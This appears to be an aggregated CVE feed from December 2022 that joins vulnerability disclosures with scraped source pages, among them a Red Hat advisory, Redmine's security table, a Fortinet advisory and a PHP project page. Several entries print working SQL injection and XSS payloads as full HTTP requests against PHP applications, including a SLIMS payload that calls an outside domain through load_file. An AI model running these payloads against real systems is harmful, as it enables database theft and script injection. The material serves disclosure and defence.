Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=services/view_service&id=.

Permalink

Cannot retrieve contributors at this time

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: ep0ch

Login account: admin/admin123 (SuperAdmin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php 8.1 version

Vulnerability File: /php-sms/admin/services/view\_service.php

Vulnerability location: /php-sms/admin/?page=services/view\_service&id=

Vulnerability Parameter: id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=services/view\_service&id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+

exp:

    GET /php-sms/admin/?page=services/view_service&id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1
    Host: 192.168.1.88
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
    Connection: close

CVE-2022-44393: vul_report/SQLi-1.md at main · Serces-X/vul_report

An issue was discovered in ZZCMS 2022. There is a cross-site scripting (XSS) vulnerability in admin/ad_list.php.

**ZZCMS the lastest version download page :**

http://www.zzcms.net/about/download.html

software link: http://www.zzcms.net/download/zzcms2022.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**Essential information**

version:2022  
File path:admin/ad\_list.php  
parameter:page  
request method:REQUEST  
payload:1");alert(/xss/);("

**Principle analysis**

admin/ad\_list.php line 17  
Get the parameter(page) through the REQUEST method and pass the parameter to the checkid () function.

inc/function.global.php line 14  
Let's see the checkid () function again. The content of the ID parameter comes from the page parameter obtained by the request method. The function first determines whether the ​ID is a number. If it is not a number, it executes the showmsg() function and passes the $ID to the showmsg() function.

inc/function.php line 23  
See the showmsg() function, in which line 24, you can execute malicious code by closing the alert() function  
for example：payload=");alert("1");("

**Loophole recurrence**

First log in to the website：http://localhost/admin/login.php

Access:http://localhost/admin/ad_list.php?page= ");alert(/xss/) ;(", and then two pop-up windows will pop up. The second pop-up content is the detection content.

CVE-2022-44361: ZZCMS2022 has a xss · Issue #1 · cri1stur/ZZcms

Red Hat Security Advisory 2022-8827-01 - Updated images are now available for Red Hat Advanced Cluster Security (RHACS). The updated image includes new features and bug fixes.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256====================================================================                   Red Hat Security AdvisorySynopsis:          Low: RHACS 3.73 enhancement and security updateAdvisory ID:       RHSA-2022:8827-01Product:           RHACSAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:8827Issue date:        2022-12-06CVE Names:         CVE-2022-24778 CVE-2022-36056 CVE-2022-42898====================================================================1. Summary:Updated images are now available for Red Hat Advanced Cluster Security(RHACS). The updated image includes new features and bug fixes.Red Hat Product Security has rated this update as having a security impactof Low. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.2. Description:Release of RHACS 3.73 provides these changes:New features:* Red Hat Advanced Cluster Security Cloud Service (ACSCS) is a Red Hatmanaged service that simplifies and accelerates RHACS deployments. ACSCS isavailable as a Field Trial release. For more information about accessingACSCS, contact Red Hat Sales.* Improved Vulnerability Management dashboard for ACSCS users.* PostgreSQL database option is available as Technology Preview feature. Ifyou are interested in participating in the Tech Preview program, contactyour Red Hat account representative.* A new build-time network policy generator as Technology Preview feature,to generate Kubernetes network policies based on Application YAMLmanifests.Notable technical changes:* RHACS uses GraphQL internally to show data in the RHACS portal. However,Red Hat does not support querying RHACS using GraphQL. If you are usingGraphQL, see https://access.redhat.com/articles/6986289 and contact Red HatConsulting.* Sensor no longer uses `anyuid` Security Context Constraint (SCC).Instead, the default SCC for Sensor is now `restricted[-v2]` or`stackrox-sensor`, depending on the settings. In addition, the `runAsUser`and `fsGroup` for the Admission control and Sensor deployments are nolonger hard-coded to `4000` on OpenShift clusters to allow using the`restricted` and `restricted-v2` SCCs. (ROX-9342)* The service account `central`, which the Central deployment uses, nowincludes `get` and `list` access to the pods, events, and namespacesresources in the namespace where you deploy Central.* The CSV export API `/api/vm/export/csv` now requires the `CVE Type`filter as part of the input query parameter. Supported values for `CVEType` are `IMAGE_CVE`, `K8S_CVE`, `ISTIO_CVE`, `NODE_CVE`, and`OPENSHIFT_CVE`.Notice of in-product docs removal:* Beginning in the RHACS 3.74 release, Red Hat will remove the in-productdocs accessible from the help menu. If you are using the in-product docs,you can instead download the required documentation in PDF format from RedHat Customer Portal. (ROX-12839)Bug fixes:* Previously, if you were using StackRox Kubernetes Security Platform -Splunk Technology Add-on, results for the `ocp4-cis-node` compliancestandard was missing from Splunk. This issue is now fixed. The Splunkintegration now includes the `ocp4-cis-node` compliance standard results.(ROX-11937)* Previously, Central would fail on the v1 CronJob deployment check. Thisissue is fixed. (ROX-13500)Security Fix(es):* imgcrypt: Unauthorized access to encryted container image on a sharedsystem due to missing check in CheckAuthorization() code path(CVE-2022-24778)* app-containers/cosign: false positive verification (CVE-2022-36056)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.3. Solution:To take advantage of the new features, bug fixes, and enhancements in RHACS3.73 you are advised to upgrade to RHACS 3.73.0.4. Bugs fixed (https://bugzilla.redhat.com/):2069368 - CVE-2022-24778 imgcrypt: Unauthorized access to encryted container image on a shared system due to missing check in CheckAuthorization() code path2128820 - CVE-2022-36056 app-containers/cosign: false positive verification5. JIRA issues fixed (https://issues.jboss.org/):ROX-13687 - Release RHACS 3.73.06. References:https://access.redhat.com/security/cve/CVE-2022-24778https://access.redhat.com/security/cve/CVE-2022-36056https://access.redhat.com/security/cve/CVE-2022-42898https://access.redhat.com/security/updates/classification/#lowhttps://docs.openshift.com/acs/3.73/release_notes/373-release-notes.html7. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2022 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBY4+QLtzjgjWX9erEAQhgOxAAl3J3PEic6f7jSpbFNJVnj4ACQxursTFGCX9qxbMTwCy19vqKx/pummlobOSRhweidwVJMMSIaXW0/ZLJyuyLDhKBjrBhjq67kpuJBilDSDWwZNJLqtU9QFx/VJyHcnACuPf22SFouXW3FZS6a4dlvK2N7va3WiwcyW29PdwRjfe8gft8UIbzLb3T2UokXwNY5s34y8q8y1Lr2KFUqFxM7e/IKl3XrLPag+rPGsw/boYhHU6U9LspaBlZ/0wv4SnYQHPvS/t5kMKiA+yRvUDmpYKo23Hi7SK+Y2c7yKUwqmeuem6ZmdefJkhTfVmTcptik1f/ie9rOHvpFeSZdZ5laEOm4DGixuh3J1qxtcMsUItYO1S8iLbF17z1jkT3V2bEZmLRjKD8L28EhYS6nqX2IfBl8wjhlbbDtv9LGFWbwwec+j1/k1kMz5u3tQThkeO9znJNYC0QiE07h28A77u7oLkC3r1OksfYvIcaQ8f8NC7AkT4kK9LhGU/w99z7y+TNErIlx3/ws3HvaSfjGsDsSVEiRh/AyCflqb5FioiHf5Mt88IoIH2mk3SUlDVyg0r5WUajdN9WQqAogTtUTesUxnUgOjuGLfxY+vVOsfSekZAk+LnlFkMrYfd28IhT9bkEFhW1NbSF5C1wfY82rpuUC1aPvsB3ua+lxqlw1gy7Hpo=If/b-----END PGP SIGNATURE-------RHSA-announce mailing listRHSA-announce@redhat.comhttps://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8827-01

Simple Phone Book/Directory Web App v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter at /PhoneBook/edit.php.

**Simple Phone book/directory Web App v1.0 by bakhtiar has SQL injection**

BUG\_Author: realguoxiufeng

vendors:https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html

Vulnerability File: /PhoneBook/edit.php

GET parameter 'editid' exists SQL injection vulnerability

Payload1: /PhoneBook/edit.php?editid=1'

    GET /PhoneBook/edit.php?editid=1' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

sql statement error

Payload2: /PhoneBook/edit.php?editid=1''

    GET /PhoneBook/edit.php?editid=1'' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

Page successfully displayed

Payload3: /PhoneBook/edit.php?editid=1%27%20AND%20(SELECT%202%20FROM%20(SELECT(SLEEP(10)))A)--%20B

    GET /PhoneBook/edit.php?editid=1%27%20AND%20(SELECT%202%20FROM%20(SELECT(SLEEP(10)))A)--%20B HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

The server's response time is 10 seconds

CVE-2022-45010: bug_report/SQLi-1.md at main · realguoxiufeng/bug_report

Rapid Software LLC Rapid SCADA 5.8.4 is vulnerable to Cross Site Scripting (XSS).

**Исследования**

Ежедневное исследование Казнета и новых способов взлома и защиты информационных систем - ответственная миссия команды NitroTeam.

Мы глубоко озабочены состоянием Информационной Безопасности в Казахстане и делимся своими наработками здесь на сайте и в социальных сетях.

 06.12.2022 0  84

**\[CVE-2022-44153\] XSS уязвимость в Rapid SCADA 5.8.4**

WEB

Наш исследователь @claunch3r обнаружил XSS уязвимость в програмном обеспечении Rapid SCADA 5.8.4

 02.06.2022 0  5166

**Множественные уязвимости в LibreHealth part 2**

WEB

Во время стажировки в нашей компании, студенты нашли множественные уязвимости в LibreHealth: Broken Access Control (CVE-2022-31496), Cross-Site Scripting (CVE-2022-31492, CVE-2022-31493, CVE-2022-31494, CVE-2022-31495, CVE-2022-31497, CVE-2022-31498).

 04.05.2022 0  9060

**Описание уязвимостей CVE-2022-29938, CVE-2022-29939, CVE-2022-29940 в LibreHealth**

WEB

Наш исследователь нашел в LibreHealth EHR 2.0.0 множественные уязвимости, а именно 1 SQL-injection (CVE-2022-29938) и 2 Cross-site scripting (XSS) (CVE-2022-29939, CVE-2022-29940)

 15.02.2021 0  8018

**Описание CVE-2020-29139, CVE-2020-29140, CVE-2020-29142, CVE-2020-29143 в OpenEMR 6.0.0-dev, OpenEMR 5.0.2(5)**

WEB

В ходе исследования движка для медицинских организаций OpenEMR с открытым исходным кодом были обнаружены 4 уязвимости типа SQL-инъекция. Тестирование уязвимостей производилось на Windows 10, Apache 2.4, 10.3.22-MariaDB. PHP 7.1.33 для OpenEMR 5.0.2(5) и PHP 7.4 для OpenEMR 6.0.0-dev. Настоятельно рекомендуем обновиться до последней версии продукта.

CVE-2022-44153: Nitro Team Researches

Redmine 5.x before 5.0.4 allows downloading of file attachments of any Issue or any Wiki page due to insufficient permission checks. Depending on the configuration, this may require login as a registered user.

This page lists the security vulnerabilities that were fixed in Redmine releases, starting from 1.3.0. If you think that you've found a security vulnerability, please report it by sending an email to: security(at)redmine.org.

To detect if your own Redmine is subject to any of these vulnerabilties, you can use Planio's Redmine Security Scanner.

Severity Details External references Affected versions Fixed versions Critical Access Control Issue in attachments#download\_all (#37772) CVE-2022-44030 5.0.0 - 5.0.3 5.0.4 High Persistent XSS in textile formatting due to blockquote citation (#37751) CVE-2022-44031 All prior releases 5.0.4 and 4.2.9 High Redmine contains a cross-site scripting vulnerability (#37767) CVE-2022-44637 All prior releases 5.0.4 and 4.2.9 Moderate Open Redirect in attachments#download\_all (#37880) All prior releases since 4.2.0 5.0.4 and 4.2.9 Moderate Unbounded resource exhaustion in cmark-gfm autolink extension may lead to denial of service (#37872) CVE-2022-39209 5.0.0 - 5.0.2 5.0.4 and 4.2.9 Moderate no-permission-check allows issue creation in closed/archived projects (#37187) All prior releases 5.0.2 and 4.2.7 High Information Leak in QueryAssociationColumn and QueryAssociationCustomFieldColumn (#37255) All prior releases since 3.4.0 5.0.2 and 4.2.7 High Remote code execution in commonmarker gem (#37136) CVE-2022-24724 5.0.0 and 5.0.1 5.0.2 Moderate 3 XSS security vulnerabilities in jQuery UI < v1.13.0 (#37256) CVE-2021-41182, CVE-2021-41183, CVE-2021-41184 All prior releases 5.0.2 and 4.2.7 Moderate Ruby on Rails vulnerability (announcement) CVE-2022-22577, CVS-2022-27777 All prior releases 5.0.1 and 4.2.6 Moderate Ruby on Rails vulnerability (announcement) CVE-2022-23633 All Redmine 4.\* versions 4.2.4 and 4.1.6 Moderate Activities index view is leaking usernames (#35789) CVE-2021-42326 All prior releases 4.2.3 and 4.1.5 Low User sessions not reset after activation of two-factor authentication (#35417) CVE-2021-37156 4.2.0 and 4.2.1 4.2.2 High Ruby on Rails vulnerabilities (announcement) CVE-2021-22885, CVE-2021-22904 All prior releases 4.2.2 and 4.1.4 Low Mail handler bypasses add\_issue\_notes permission (#35045) CVE-2021-31864 All prior releases since 3.3.0 4.2.1, 4.1.3 and 4.0.9 Moderate Allowed filename extensions of attachments can be circumvented (#34367) CVE-2021-31865 All prior releases 4.2.1, 4.1.3 and 4.0.9 Critical Arbitrary file read in Git adapter (#35085) CVE-2021-31863 All prior releases 4.2.1, 4.1.3 and 4.0.9 Moderate SysController and MailHandlerController are vulnerable to timing attack (#34950) CVE-2021-31866 All prior releases to 4.2.0 4.2.0, 4.1.3 and 4.0.9 High Inline issue auto complete doesn't sanitize HTML tags (#33846) CVE-2021-29274 4.1.0 and 4.1.1 4.1.2 and 4.0.8 Moderate Names of private projects are leaked by issue journal details that contain project\_id changes(#33360) CVE-2021-30163 All prior releases 4.1.2 and 4.0.8 High Issues API bypasses add\_issue\_notes permission (#33689) CVE-2021-30164 All prior releases since 3.3.0 4.1.2 and 4.0.8 High Ruby on Rails vulnerabilities (rails 5.2.4.3, rails 5.2.4.5) CVE-2020-8162, CVE-2020-8164, CVE-2020-8165, CVE-2020-8166, CVE-2020-8167, CVE-2021-22880, CVE-2021-22881 All prior releases 4.1.2 and 4.0.8 Moderate XSS vulnerability due to missing back\_url validation (#32850) CVE-2020-36306 All prior releases 4.1.1 and 4.0.7 High Persistent XSS vulnerabilities in textile inline links (#32934) CVE-2020-36307 All prior releases 4.1.1 and 4.0.7 Moderate Time entries CSV export may disclose subjects of issues that are not visible CVE-2020-36308 All prior releases 4.1.1 and 4.0.7 Moderate Improper markup sanitization in Textile formatting (#25742) CVE-2019-25026 All prior releases 4.0.6 and 3.4.13 Critical SQL injection CVE-2019-18890 Redmine <= 3.3.9 3.3.10 High Persistent XSS in textile formatting CVE-2019-17427 All prior releases 3.4.11 and 4.0.4 Critical Ruby on Rails vulnerabilities (announcement) CVE-2019-5418, CVE-2019-5419, CVE-2019-5420 All prior releases 3.4.10 and 4.0.3 High Remote command execution through mercurial adapter CVE-2017-18026 All prior releases 3.2.9, 3.3.6 and 3.4.4 High Multiple XSS vulnerabilities (#27186) CVE-2017-15568, CVE-2017-15569, CVE-2017-15570, CVE-2017-15571 All prior releases 3.2.8, 3.3.5 and 3.4.3 Low Email reminders reveal information about inaccessible issues (#25713) CVE-2017-16804 All prior releases 3.2.7, 3.3.4 and 3.4.0 Moderate Improper markup sanitization in wiki content (#25503) CVE-2017-15573 All prior releases 3.2.6 and 3.3.3 Moderate Use redirect on /account/lost\_password to prevent password reset tokens in referers (#24416) CVE-2017-15572 All prior releases 3.2.6 and 3.3.3 Moderate Redmine.pm doesn't check that the repository module is enabled on project (#24307) CVE-2017-15575 All prior releases 3.2.6 and 3.3.3 High Stored XSS with SVG attachments (#24199) CVE-2017-15574 All prior releases 3.2.6 and 3.3.3 Moderate Information leak when rendering Time Entry on activity view (#23803) CVE-2017-15576 All prior releases 3.2.6 and 3.3.3 Moderate Information leak when rendering Wiki links (#23793) CVE-2017-15577 All prior releases 3.2.6 and 3.3.3 High Persistent XSS vulnerabilities in text formatting (Textile and Markdown) and project homepage CVE-2016-10515 All prior releases 3.2.3 Critical ImageMagick vulnerabilities CVE-2016-3714 All prior releases since 2.1.0 3.1.5 and 3.2.2 Moderate Data disclosure in atom feed CVE-2015-8537 All prior releases 2.6.9, 3.0.7 and 3.1.3 Moderate Potential changeset message disclosure in issues API CVE-2015-8473 All prior releases 2.6.8, 3.0.6 and 3.1.2 Moderate Data disclosure on the time logging form CVE-2015-8346 All prior releases 2.6.8, 3.0.6 and 3.1.2 Moderate Open Redirect vulnerability CVE-2015-8474 2.5.1 to 2.6.6, 3.0.0 to 3.0.4 and 3.1.0 2.6.7, 3.0.5 and 3.1.1 Low Potential XSS vulnerability when rendering some flash messages CVE-2015-8477 All prior releases 2.6.2 and 3.0.0 Moderate Potential data leak (project names) in the invalid form authenticity token error screen All prior releases 2.4.6 and 2.5.2 Moderate Open Redirect vulnerability JVN#93004610, CVE-2014-1985 All prior releases 2.4.5 and 2.5.1 Critical Ruby on Rails vulnerability (announcement) All releases prior to 2.2.4 2.2.4, 2.3.0 Critical Ruby on Rails vulnerability (announcement) All releases prior to 2.2.3 2.2.3 Critical Ruby on Rails vulnerability (announcement) All releases prior to 2.2.1 and 2.1.6 Fix for 1.4.7 Critical Ruby on Rails vulnerability (announcement) All releases prior to 2.2.1 and 2.1.6 1.4.7 Critical Ruby on Rails vulnerability (announcement) All prior releases 2.2.1, 2.1.6, 1.4.6 Moderate XSS vulnerability 2.1.0 and 2.1.1 2.1.2 High Persistent XSS vulnerability JVN#93406632, CVE-2012-0327 All prior releases 1.3.2 Moderate Mass-assignemnt vulnerability that would allow an attacker to bypass part of the security checks All prior releases 1.3.2 High Vulnerability that would allow an attacker to bypass the CSRF protection All prior releases 1.3.0

CVE-2022-44030: Security Advisories - Redmine

AutoTaxi Stand Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component search.php.

**Auto/Taxi Stand Management System using PHP and MySQL**

“Auto/Taxi Stand Management System” is a web-based technology that will manage the records of the incoming and outgoing autos and taxis in a parking stand. It’s an easy for Admin to retrieve the data if the auto and taxi has been visited through the number he can get that data“Auto/Taxi Stand Management Project in PHP”  is an automatic system that delivers data processing in very high speed in a systematic manner.

**Project Requirements**

Project Name

Auto/Taxi Stand Management System Project (Using PHP & MYSQLi)

Language Used

PHP5.6, PHP7.x

Database

MySQL 5.x

User Interface Design

HTML, AJAX,JQUERY,JAVASCRIPT

Web Browser

Mozilla, Google Chrome, IE8, OPERA

Software

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

In “Auto/Taxi Stand Management System project”  we use PHP and MySQL database. This is the project which keeps records of the auto and taxi which is going to park in the stand. “Auto/Taxi Stand Management System”  have module i.e., admin and user.

**User**

User can only view the Auto/Taxi stand recipient by using their name and mobile number. number.

**Admin**

**Dashboard**: In this sections, the admin can briefly view the number of auto and taxi entries in a particular period.

**New Auto/Taxi Entry**: In this section, admin add auto and taxi which is going into the stand.

**Manage Auto/Taxi Entry**: In this section, admin can manage incoming and outgoing auto and taxi and the admin can also add parking charges and his/her remarks.

**Reports**: In this section admin can generate auto and taxi entry reports between two dates.

Admin can also update his profile, change the password and recover the password.

****Some of the Project Screens****

**Admin Login**

**Admin Dashboard**

**Auto/Taxi Stand Entry Form**

**Auto/Taxi Stand Receipt**

**How to run the Auto/Taxi Stand Management System Project Using PHP and M**ySQL****

1\. Download the zip file

2\. Extract the file and copy atsms  folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/HTML)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with the name atsmsdb

6\. Import atsmsdb.sql file(given inside the zip package in the SQL file folder)

7\. Run the script http://localhost/atsms

**Credential for admin panel :**  
Username: admin  
Password: Test@123

**View Demo**

**Download Project Source Code**

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2022-43369: Auto/Taxi Stand Management System Project in PHP | Auto Stand Management Project

An improper neutralization of special elements used in an SQL Command ('SQL Injection') vulnerability in Fortinet FortiADC version 7.1.0, version 7.0.0 through 7.0.2 and version 6.2.4 and below allows an authenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests.

** PSIRT Advisories**

**FortiADC - SQL injection vulnerability in configuration backup feature**

**Summary**

An improper neutralization of special elements used in an SQL Command ('SQL Injection') vulnerability \[CWE-89\] in FortiADC may allow an authenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests.

**Affected Products**

FortiADC version 7.1.0  
FortiADC version 7.0.0 through 7.0.2  
FortiADC version 6.2.0 through 6.2.4  
FortiADC version 6.1 all versions  
FortiADC version 6.0 all versions  
FortiADC version 5.4 all versions  
FortiADC version 5.3 all versions  
FortiADC version 5.2 all versions

**Solutions**

Please upgrade to FortiADC version 7.1.1 or above  
Please upgrade to FortiADC version 7.0.3 or above  
Please upgrade to FortiADC version 6.2.5 or above

**Acknowledgement**

Internally discovered and reported by Théo Leleu of Fortinet Product Security team.

CVE-2022-33875: Fortiguard

An XML external entity (XXE) injection vulnerability in Kwoksys Kwok Information Server before v2.9.5.SP31 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks.

CVE-2022-45326: Kwoksys 2.9.5 XXE

Senayan Library Management System version 9.5.1 suffers from a remote SQL injection vulnerability.

## Title: Senayan Library Management System v9.5.1 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 12.06.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.5.1/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1## Description:The manual insertion `point 4` appears to be vulnerable to SQLinjection attacks.The payload '+(selectload_file('\\\\mmceb8f9w8n0s3mutza4ttmxzo5it8hzknbdy6mv.again.com\\ejf'))+'was submitted in the manual insertion `point 4` testing.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can execute a very dangerous `subquery` to view verysensitive information.## STATUS: HIGH Vulnerability[+] Payload:```MySQLGET /slims9_bulian-9.5.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb%27%2b(select*from(select(sleep(5)))a)%2b%27&membershipType=a&collType=aaaaHTTP/1.1Host: pwnedhost.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=tc5upjgvv2j3mid2ur5tdmmpje; admin_logged_in=1;SenayanMember=schm4nbtgbb5i1tbeonr6cav3uConnection: close```[+] Response:```MySQLHTTP/1.1 200 OKDate: Tue, 06 Dec 2022 13:51:38 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockContent-Length: 4120Connection: closeContent-Type: text/html; charset=UTF-8<!doctype html><html><head><title>Loan Report by Class Report</title>    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <link rel="stylesheet" type="text/css"href="/slims9_bulian-9.5.1/css/bootstrap.min.css"/>    <link rel="stylesheet" type="text/css"href="/slims9_bulian-9.5.1/admin/admin_template/default/style.css?31085233"/>    <script type="text/javascript"src="/slims9_bulian-9.5.1/js/jquery.js"></script>    <script type="text/javascript"src="/slims9_bulian-9.5.1/js/gui.js"></script></head><body><div id="pageContent">  <div class="mb-2">Loan Recap By Class<strong>bbbb'+(select*from(select(sleep(5)))a)+'</strong> for year<strong>2002</strong> <a class="s-btn btn btn-default printReport"onclick="window.print()" href="#">Print Current Page</a><ahref="../xlsoutput.php" class="s-btn btn btn-default"target="_BLANK">Export to spreadsheet format</a>    <a class="s-btn btn btn-info notAJAX openPopUp"href="/slims9_bulian-9.5.1/admin/modules/reporting/pop_chart.php"width="700" height="530" title="Loan Recap By Class">Show inchart/plot</a></div><table class="s-table table table-sm table-bordered"><tr><thclass="dataListHeaderPrinted">Classification</th><thclass="dataListHeaderPrinted">Jan</th><thclass="dataListHeaderPrinted">Feb</th><thclass="dataListHeaderPrinted">Mar</th><thclass="dataListHeaderPrinted">Apr</th><thclass="dataListHeaderPrinted">May</th><thclass="dataListHeaderPrinted">Jun</th><thclass="dataListHeaderPrinted">Jul</th><thclass="dataListHeaderPrinted">Aug</th><thclass="dataListHeaderPrinted">Sep</th><thclass="dataListHeaderPrinted">Oct</th><thclass="dataListHeaderPrinted">Nov</th><thclass="dataListHeaderPrinted">Dec</th></tr><tr><td><strong>bbbb'+(select*from(select(sleep(5)))a)+'00</strong></td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'00</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'10</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'20</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'30</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'40</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'50</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'60</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'70</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'80</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><